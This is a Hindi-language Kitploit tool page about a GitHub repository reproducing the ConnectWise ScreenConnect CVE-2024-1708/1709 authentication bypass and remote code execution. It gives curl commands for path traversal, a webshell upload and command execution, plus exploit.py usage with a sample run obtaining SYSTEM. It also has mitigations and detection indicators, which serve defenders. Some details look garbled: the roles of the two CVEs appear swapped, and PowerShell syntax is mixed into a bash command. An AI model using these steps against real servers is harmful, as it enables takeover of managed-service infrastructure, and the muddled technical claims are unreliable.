Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-1708-connectwise_rce_reproduction — cve-2024-1708-connectwise_rce_reproduction का पुनरुत्पादन | Kitploit
उपकरण/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction का पुनरुत्पादन

रिपॉजिटरी देखें
27 दिन पहलेअभी तक समीक्षित नहीं

CVE-2024-1708 / CVE-2024-1709 — ConnectWise ScreenConnect प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन

CVSS स्कोर: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (पाथ ट्रैवर्सल), CWE-288 (वैकल्पिक पथ का उपयोग करके प्रमाणीकरण बाईपास)
प्रभावित सॉफ़्टवेयर: ConnectWise ScreenConnect (पूर्व में ScreenConnect) ≤ 23.9.7
खोज और रिपोर्ट: फरवरी 2024
जंगली में शोषण: LockBit, Black Basta, Bl00dy, और अन्य रैंसमवेयर सहयोगी


विषय-सूची

  1. अवलोकन
  2. तकनीकी विवरण
  3. प्रभावित संस्करण
  4. पुनरुत्पादन चरण
  5. प्रूफ-ऑफ-कॉन्सेप्ट उपयोग
  6. शमन
  7. संदर्भ

1. अवलोकन

CVE-2024-1708 और CVE-2024-1709, ConnectWise ScreenConnect (पूर्व में ConnectWise Control) में कमजोरियों की एक श्रृंखलाबद्ध जोड़ी हैं जो मिलकर एक अप्रमाणित दूरस्थ हमलावर को ScreenConnect सर्वर पर पूर्ण रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती हैं।

  • CVE-2024-1708 — पाथ ट्रैवर्सल के माध्यम से प्रमाणीकरण बाईपास। SetupWizard.aspx एंडपॉइंट (और संबंधित सेटअप/अपग्रेड एंडपॉइंट) उपयोगकर्ता द्वारा आपूर्ति किए गए पाथ ट्रैवर्सल अनुक्रमों (../) को ठीक से सैनिटाइज़ नहीं करता है। एक अप्रमाणित हमलावर इच्छित सेटअप निर्देशिका से बाहर ट्रैवर्स कर सकता है और उन एंडपॉइंट्स तक पहुँच सकता है जिन्हें प्रमाणीकरण की आवश्यकता होती है। चूंकि विज़ार्ड SYSTEM (Windows) या root (Linux) खाते के संदर्भ में चलता है, हमलावर को उन्नत विशेषाधिकार विरासत में मिलते हैं।

  • CVE-2024-1709 — RCE की ओर ले जाने वाला अप्रतिबंधित फ़ाइल अपलोड। एक बार प्रमाणीकरण बाईपास हो जाने पर, हमलावर वेब रूट में एक मनमानी .aspx या अन्य निष्पादन योग्य फ़ाइल अपलोड कर सकता है। फिर अपलोड की गई फ़ाइल का अनुरोध करके, सर्वर पर मनमाना कोड निष्पादित होता है।

प्रभाव

ये कमजोरियां 19 फरवरी, 2024 से बड़े पैमाने पर शोषित की गईं, कई रैंसमवेयर समूहों द्वारा:

रैंसमवेयर समूहअभियान नोट
LockBitScreenConnect इंस्टेंस की व्यापक स्कैनिंग; डाउनस्ट्रीम में LockBit एन्क्रिप्टर तैनात करने के लिए उपयोग किया गया।
Black Bastaप्रबंधित क्लाइंट नेटवर्क में घुसपैठ करने के लिए MSP तक पहुँच का लाभ उठाया।
Bl00dyबिना पैच वाले ScreenConnect सर्वरों को लक्षित करने वाले छोटे पैमाने के अभियान।

चूंकि ScreenConnect आमतौर पर प्रबंधित सेवा प्रदाताओं (MSPs) द्वारा सैकड़ों डाउनस्ट्रीम क्लाइंट एंडपॉइंट्स को दूरस्थ रूप से प्रबंधित करने के लिए तैनात किया जाता है, एक ही समझौता किया गया ScreenConnect सर्वर सप्लाई-चेन हमले को सक्षम बनाता है — उस ScreenConnect सर्वर से जुड़े एजेंट वाला हर क्लाइंट जोखिम में है।


2. तकनीकी विवरण

2.1 प्रमाणीकरण बाईपास (CVE-2024-1708)

ScreenConnect सर्वर निम्न पते पर एक सेटअप विज़ार्ड प्रदर्शित करता है:

root@kitploit:~
/SetupWizard.aspx/

कुछ अपग्रेड/मरम्मत स्थितियों में, सर्वर प्रमाणीकरण लागू नहीं करता है क्योंकि यह मानता है कि सेटअप विज़ार्ड पहली बार चलाने का अनुभव है। महत्वपूर्ण दोष यह है कि विज़ार्ड नेमस्पेस के तहत पथों तक पहुँचते समय सर्वर __Session कुकी या Transfer-Encoding / Content-Type हेडर को कैसे संसाधित करता है।

निम्न अनुरोध भेजकर:

root@kitploit:~
/SetupWizard.aspx/../../ScreenConnect/Login.aspx

पाथ ट्रैवर्सल "सेटअप विज़ार्ड" संदर्भ को रद्द कर देता है, जबकि सर्वर अभी भी मानता है कि अप्रमाणित सत्र संदर्भ लागू होता है। हमलावर को ऐसे रीडायरेक्ट किया जाता है या पृष्ठ परोसे जाते हैं जैसे कि वह प्रमाणित हो।

वैकल्पिक वेक्टर: PrepareUpgrade.aspx / PostUpgrade.aspx हैंडलर में समान रूप से प्रमाणीकरण जाँच का अभाव है और वे फ़ाइल अपलोड कार्यक्षमता उजागर करते हैं।

2.2 रिमोट कोड निष्पादन (CVE-2024-1709)

एक बार हमलावर किसी प्रमाणित एंडपॉइंट तक पहुँच जाता है (या सेटअप संदर्भ में फ़ाइल अपलोड हैंडलर को सीधे हिट करता है), वे एक दुर्भावनापूर्ण .aspx वेबशेल अपलोड कर सकते हैं:

root@kitploit:~
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

फ़ाइल वेब एप्लिकेशन निर्देशिका (जैसे, C:\Program Files\ScreenConnect\Website\) में लिखी जाती है। अपलोड की गई शेल का अनुरोध करने पर यह सर्वर की पहचान के तहत निष्पादित होती है।

2.3 मूल कारण (CWE-22 / CWE-288)

  • रूटिंग से पहले सर्वर अनुरोध पथ को कैननिकलाइज़ करने में विफल रहता है।
  • SetupWizard.aspx हैंडलर भरोसा करता है कि उसके रूट के तहत कोई भी अनुरोध सेटअप प्रक्रिया का हिस्सा है और उसे प्रमाणीकरण बाईपास करना चाहिए — लेकिन पाथ ट्रैवर्सल उस धारणा को तोड़ देता है।
  • ../ अनुक्रमों या सिमलिंक ट्रैवर्सल का कोई उचित सत्यापन नहीं।

3. प्रभावित संस्करण

संस्करण सीमास्थिति
23.9.7 और उससे नीचेअसुरक्षित
23.9.8पैच किया गया (20 फरवरी, 2024 को जारी)
23.9.9पैच किया गया
23.9.10 (नवीनतम)पैच किया गया

नोट: सेल्फ-होस्टेड (ऑन-प्रिमाइसेस) ScreenConnect सर्वर प्राथमिक लक्ष्य हैं। ConnectWise-होस्टेड (क्लाउड) ScreenConnect इंस्टेंस सार्वजनिक प्रकटीकरण से पहले पैच किए गए थे और कभी असुरक्षित नहीं थे।


4. पुनरुत्पादन चरण

4.1 लैब सेटअप

  1. एक असुरक्षित ScreenConnect संस्करण डाउनलोड करें (23.9.7 या पुराना)।
    आधिकारिक इंस्टॉलर ConnectWise पार्टनर आर्काइव के माध्यम से उपलब्ध हो सकते हैं। परीक्षण के लिए, एक अलग VM का उपयोग करें।
  2. Windows Server (2019/2022) या Linux होस्ट पर इंस्टॉल करें।
    • डिफ़ॉल्ट इंस्टॉल पथ:
      • Windows: C:\Program Files\ScreenConnect\
      • Linux: /opt/screenconnect/
    • डिफ़ॉल्ट वेब पोर्ट: 8040 (HTTP) या 443 (HTTPS यदि कॉन्फ़िगर किया गया हो)
  3. सुनिश्चित करें कि सर्वर नेटवर्क-पृथक है — परीक्षण के दौरान इसे इंटरनेट पर उजागर न करें।

4.2 कमजोरी सत्यापित करें

root@kitploit:~
# संस्करण जांचें
curl -s http://<target>:8040/ | Select-String "ScreenConnect"

या वेब इंटरफ़ेस तक पहुँचें और पृष्ठ स्रोत में संस्करण संख्या नोट करें।

4.3 पाथ ट्रैवर्सल परीक्षण

root@kitploit:~
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

असुरक्षित सर्वर पर अपेक्षित व्यवहार:

  • प्रतिक्रिया सामान्य लॉगिन प्रॉम्प्ट के बिना एक सत्र-प्रमाणित पृष्ठ पर 200 OK या 302 रीडायरेक्ट लौटाती है।
  • प्रतिक्रिया में ScreenConnect एडमिन कंसोल HTML हो सकता है।

4.4 वेबशेल अपलोड

root@kitploit:~
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 कमांड निष्पादित करें

root@kitploit:~
curl "http://<target>:8040/shell.aspx?cmd=whoami"

5. प्रूफ-ऑफ-कॉन्सेप्ट उपयोग

साथ में दी गई exploit.py स्क्रिप्ट उपरोक्त चरणों को स्वचालित करती है:

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS

Example:
  python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"

नमूना रन

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -c "whoami"

[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system

6. शमन

तत्काल (पैच)

  • ScreenConnect को संस्करण 23.9.8 या उसके बाद अपग्रेड करें।
  • ConnectWise ने 20 फरवरी, 2024 को पैच जारी किए।

प्रतिपूरक नियंत्रण

पहचान

वेब सर्वर लॉग में निम्नलिखित IoCs खोजें:

root@kitploit:~
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=

7. संदर्भ


अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है। उन प्रणालियों के खिलाफ अनधिकृत परीक्षण जिनके मालिक आप नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है, अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं हैं।

टूल डाउनलोड करें
नियंत्रणकार्यान्वयन
WAF नियम/SetupWizard.aspx/ के बाद URL पथ में ../ वाले अनुरोधों को ब्लॉक करें
नेटवर्क सेगमेंटेशनScreenConnect को सख्त ईग्रेस फ़िल्टरिंग के साथ एक पृथक प्रबंधन VLAN में रखें
एक्सेस नियंत्रणScreenConnect वेब इंटरफ़ेस तक पहुँच को केवल विश्वसनीय IP रेंज तक सीमित करें
निगरानीबाहरी स्रोतों से /SetupWizard.aspx/ के अनुरोधों, या ScreenConnect\Website\ में अप्रत्याशित .aspx फ़ाइल निर्माण पर अलर्ट करें
MFAजबकि MFA इसे रोक नहीं पाएगा (प्रमाणीकरण बाईपास लॉगिन से पहले है), रक्षा-गहराई के लिए इसे सभी प्रशासनिक खातों पर लागू करें
स्रोतURL
NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
ConnectWise सुरक्षा सलाहकारhttps://www.connectwise.com/company/trust/security-advisories
Huntress Labs - प्रारंभिक प्रकटीकरणhttps://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
CISA ज्ञात शोषित कमजोरियांhttps://www.cisa.gov/known-exploited-vulnerabilities
ATT&CK तकनीक: बाहरी दूरस्थ सेवाएं (T1133)https://attack.mitre.org/techniques/T1133/